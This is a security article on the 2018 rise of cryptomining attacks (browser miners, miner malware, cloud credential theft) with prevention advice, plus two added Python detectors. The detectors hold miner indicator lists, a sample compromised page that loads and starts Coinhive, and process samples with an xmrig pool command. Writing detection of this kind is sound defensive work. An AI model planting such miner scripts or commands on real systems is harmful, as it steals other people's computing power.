Crypto mining attacks explode in 2018 with no end in sight
Cryptomining malware attacks are increasing, with close to 50% of organizations hit globally
Cryptomining attacks are the top cyber threat of 2018; they are costing companies hundreds of thousands of dollars, and will continue to grow as the malware used in the attacks spreads and cryptocurrency values rise
The steep rise in the price of Bitcoin in 2017 brought with it new cyberattacks to take advantage of this untraceable cryptocurrency. Widespread ransomware attacks like WannaCry and NotPetya cost companies millions around the globe. Now, criminals are increasingly turning to a new style of attack to harvest cryptocurrency from unsuspecting victims: cryptomining attacks.
Beginnings of Cryptomining Attacks
Large-scale cryptomining attacks began in September 2017, when Coinhive introduced a JavaScript miner that enabled cryptocurrency mining within a browser. Criminals immediately began exploiting vulnerable browsers and luring unsuspecting victims to illicit websites so that their machines could be used for cryptomining. According to security firm Malwarebytes, illicit cryptocurrency mining is now the top cyber-criminal activity, and security firm Imperva reported seeing cryptomining in 90% of all remote code execution attacks. Cryptomining modules are increasingly included in malicious spam attachments, drive-by download attacks, and malicious mobile apps. Comodo Cybersecurity Threat Research Labs named cryptominer-based attacks the top malware threat of 2018, detecting 28.9 million cryptominer incidents in Q1 2018.
Cryptomining and Cryptocurrency – Bitcoin Mining and More
Cryptocurrencies, Bitcoin included, are digital currencies secured using cryptography. They are not created or controlled by a government, but instead by a computer program or algorithm that determines how new currency is found and released and how transactions are made. Transactions are made between individuals, without using banks, and recorded on a public record – the infamous blockchain. A large driver for early adoption of Bitcoin was illicit transactions via the Silk Road – a dark web marketplace, like a criminal eBay, that sold drugs, weapons, and other contraband and used Bitcoin to remain untraceable. While Bitcoin was created in 2009 by Satoshi Nakamoto, cryptocurrency really became popular in 2017, when Bitcoin rose in value from $900 to nearly $20,000.
Where do Bitcoins Come From?
Instead of a central bank releasing more money into circulation, as with the USD, cryptocurrency increases circulation by releasing cryptocoins to the ‘miners’ who lend computing power to perform the cryptographic work of maintaining the blockchain. Miners verify the transactions that are continually added to the blockchain and are rewarded with a payment in cryptocoin. By stealing processing power to solve these complex calculations, cyber criminals can effectively use victim computers to mine cryptocurrency, often without the victim’s knowledge. According to a recent Check Point investigation, Bitcoin commits a new block of transactions every 10 minutes to its ledger and awards 12.5 bitcoins to its miner, equating to about $130,000 every 10 minutes or $6.8 billion annually. Although many attacks do use Bitcoin, many are now moving to Monero. Bitcoin wallets can be blocked or blacklisted and transactions tracked – but Monero cannot be tracked, blacklisted, or traced to a specific person.
The Rise of Cryptomining Attacks
With the huge increase in the value of Bitcoin came a surge in cyber-attacks using it to extract payment from victims. Criminals targeted Bitcoin and other cryptocurrencies due to their anonymity and decentralized system.
According to a recent NullTX report, 97% of dark web illicit activity has been conducted through Bitcoin. While ransomware has notably used cryptocurrencies as a means to extract ransoms from victims, cryptomining is a new way for criminals to steal from victims. By exploiting vulnerabilities, or simply a victim’s visit to a web page, criminals steal the processing power of unsuspecting victims to mine cryptocurrency directly.
Types of Cryptomining Attacks
Cryptomining attacks are a growing threat to businesses and organizations globally. They fall into two categories – malicious downloads and websites hosting cryptomining scripts that run on the visitor’s system.
Cryptomining Malware
While attackers previously might have targeted sensitive data after a breach, they are now targeting computing power itself. Check Point’s monthly malware report found earlier this year that three of the top four malware types spotted by the security firm were miners – Cryptoloot, JSEcoin, and Coinhive – with the fourth, the RIG exploit kit (RigEK), being used to distribute miners. Attackers install these malicious miners by targeting vulnerabilities and including them in phishing attacks. Malicious miners are not limited to computers – malicious apps on mobile phones can drive the hardware so hard that phones overheat and even melt.
Insider attacks are also common. In one example, a European bank experienced unusual traffic on its servers, suffering slow processing overnight. Darktrace reported finding that an employee had set up a cryptomining system under the floorboards, programmed to run covertly at night.
Cloud Computing and Cryptomining Attacks Cost Big
Cryptomining malware can be particularly costly when the malicious miners are installed after an attacker has gained access to a target system. Earlier this year, RedLock Cloud Security Intelligence reported that attackers had gained access to Tesla’s cloud environment, leveraging a Kubernetes console that was not password protected in order to steal AWS credentials and spin up a cryptomining cluster of computers. The RedLock report detailed how criminals regularly stole credentials to a company’s AWS, Azure, or other cloud computing provider. Criminals could then start up new compute instances to use for mining, which added up to a hefty bill for the victim before the intrusion was detected. In an elastic cloud, the environment auto-scales, spawning additional instances to support the mining operation and adding to cloud hosting costs.
Clickjacking Cryptominers
In some cases, attackers have compromised corporate websites, embedding mining JavaScript in the site’s HTML pages. Website visitors then load the malicious JavaScript and become miners themselves, which may damage the company’s reputation and result in a poor customer experience, especially after the negative publicity surrounding the discovery of such attacks. This pattern has affected more than 4,000 websites, according to a recent ICO report.
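A site owner can catch the injected-script pattern described above with a periodic integrity check of their own pages. The following is an added example, not code from the original article: it collects every script tag from a page and flags external sources on an illustrative (and deliberately short) list of miner domains, plus inline bodies that use Coinhive’s documented `CoinHive.Anonymous` API or a `stratum+tcp://` pool URL. The domain list, the regexes, and the sample page (with a placeholder site key) are constructed for this example and should be maintained by the operator.

```python
import re
from html.parser import HTMLParser

# Illustrative indicator list (assumption: the operator keeps this current; the
# families named in the article are Coinhive, Cryptoloot and JSEcoin).
MINER_DOMAINS = ("coinhive.com", "coin-hive.com", "crypto-loot.com", "jsecoin.com")
INLINE_PATTERNS = (
    re.compile(r"CoinHive\.Anonymous\s*\(", re.I),  # Coinhive's browser API entry point
    re.compile(r"stratum\+(tcp|ssl)://", re.I),     # mining-pool protocol URL
)

class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from one page."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

def find_miner_scripts(html):
    """Return a list of (kind, evidence) findings; an empty list means clean."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        if any(domain in src.lower() for domain in MINER_DOMAINS):
            findings.append(("external", src))
    for body in collector.inline:
        for pattern in INLINE_PATTERNS:
            if pattern.search(body):
                findings.append(("inline", pattern.pattern))
                break
    return findings

# Constructed sample of a compromised page (site key is a placeholder, not real).
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
<script src="/static/app.js"></script>
</head><body>Hello</body></html>"""
```

Run it against a crawl of your own pages and alert on any non-empty result; a Content-Security-Policy that whitelists script sources is the complementary preventive control.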
How to Prevent Cryptomining Attacks
Several key defensive measures are needed against this new attack method:
- Incorporate cryptomining attacks into security awareness training – many cryptomining attacks begin with an attack on the user – via drive-by-download, phishing emails, or clickjacking on malicious websites. Employee training helps potential victims to avoid malicious websites and realize the threat posed by these new attack methods.
- Install anti-cryptomining extensions on web browsers – cryptomining attackers rely on JavaScript-based browser attacks. Extensions like No Coin and MinerBlock are designed to detect and block these cryptomining scripts and protect unwitting victims. Organizations can also restrict the allowed browser extensions, preventing users from unwittingly installing poisoned or malicious extensions that execute cryptomining scripts.
- Implement robust vulnerability management – many endpoint protection solutions have now added cryptominer detection, using the heavy processor load that miners generate to detect and block malicious processes. By conducting regular vulnerability assessments, organizations can identify vulnerabilities that attackers might use to install cryptomining malware on their systems, or malicious scripts on their website.
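The endpoint-side detection mentioned in the list above (a miner betrays itself through sustained processor load) can be reproduced with a few lines of monitoring logic. The following is an added example, not code from the original article or from any vendor product: it reads constructed `ps -eo pid,pcpu,args`-style snapshots taken a minute apart, raises a high-severity alert for any command line carrying a miner indicator (a `stratum` pool URL or a known miner binary name), and a medium-severity alert for any process that stays above the CPU threshold across every snapshot even when its name looks innocuous. The snapshots, thresholds and indicator regexes are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed snapshots (assumption: an agent or cron job collects one per minute).
SNAPSHOTS = [
    ["1201 97.5 /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER",
     "2210 12.0 /usr/bin/python3 /opt/app/worker.py",
     "3005 99.0 /usr/lib/firefox/firefox",           # briefly busy, not sustained
     "4100 94.0 /var/tmp/.cache/update"],            # renamed miner, no obvious indicator
    ["1201 98.1 /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER",
     "2210 8.5 /usr/bin/python3 /opt/app/worker.py",
     "3005 35.0 /usr/lib/firefox/firefox",
     "4100 96.0 /var/tmp/.cache/update"],
    ["1201 96.0 /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER",
     "2210 10.0 /usr/bin/python3 /opt/app/worker.py",
     "3005 20.0 /usr/lib/firefox/firefox",
     "4100 95.0 /var/tmp/.cache/update"],
]

CPU_THRESHOLD = 90.0        # percent of one core, per snapshot
SUSTAINED_SNAPSHOTS = 3     # how many consecutive snapshots count as "sustained"
MINER_INDICATORS = (        # illustrative; extend from your own threat intel
    re.compile(r"stratum\+(tcp|ssl)://", re.I),
    re.compile(r"\b(xmrig|minerd|cpuminer)\b", re.I),
    re.compile(r"--donate-level", re.I),
)
LINE_RE = re.compile(r"^\s*(\d+)\s+([\d.]+)\s+(.*)$")

def parse_snapshot(lines):
    """Map pid -> (cpu_percent, command line) for one snapshot."""
    rows = {}
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            rows[int(m.group(1))] = (float(m.group(2)), m.group(3))
    return rows

def detect_miners(snapshots, threshold=CPU_THRESHOLD, sustained=SUSTAINED_SNAPSHOTS):
    """Return {pid: {"cmd", "hot_count", "indicator", "severity"}} for suspects."""
    hot, cmds = defaultdict(int), {}
    for snap in snapshots:
        for pid, (cpu, cmd) in parse_snapshot(snap).items():
            cmds[pid] = cmd
            if cpu >= threshold:
                hot[pid] += 1
    alerts = {}
    for pid, cmd in cmds.items():
        indicator = next((p.pattern for p in MINER_INDICATORS if p.search(cmd)), None)
        if indicator or hot[pid] >= sustained:
            alerts[pid] = {"cmd": cmd, "hot_count": hot[pid], "indicator": indicator,
                           "severity": "high" if indicator else "medium"}
    return alerts
```

Medium alerts need triage (a build server or video encoder will also trip them), which is why the command line and hot-snapshot count are carried along for the analyst.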
Conclusion
Cryptomining in the browser works when JavaScript embedded in a website leverages a visiting device’s processing power to mine cryptocurrency. Cryptomining malware works by installing a miner on the target system, either by exploiting a vulnerability or by tricking the user into installing the malicious miner (usually via phishing). Since these attacks are very successful and profitable for criminals, their use is likely to continue. Organizations have many options available to mitigate this new risk, with a strong vulnerability management program being the most important method to identify and mitigate cyber threats.
Starting with a vulnerability scan or penetration test will, at the very least, uncover known vulnerabilities that can be exploited by cryptomining malware. One glaring difference between cryptomining attacks and a typical attack targeting sensitive data is that, in many cases, the attacker does not care which system they compromise. Thus, both high-value and low-value assets need to be protected.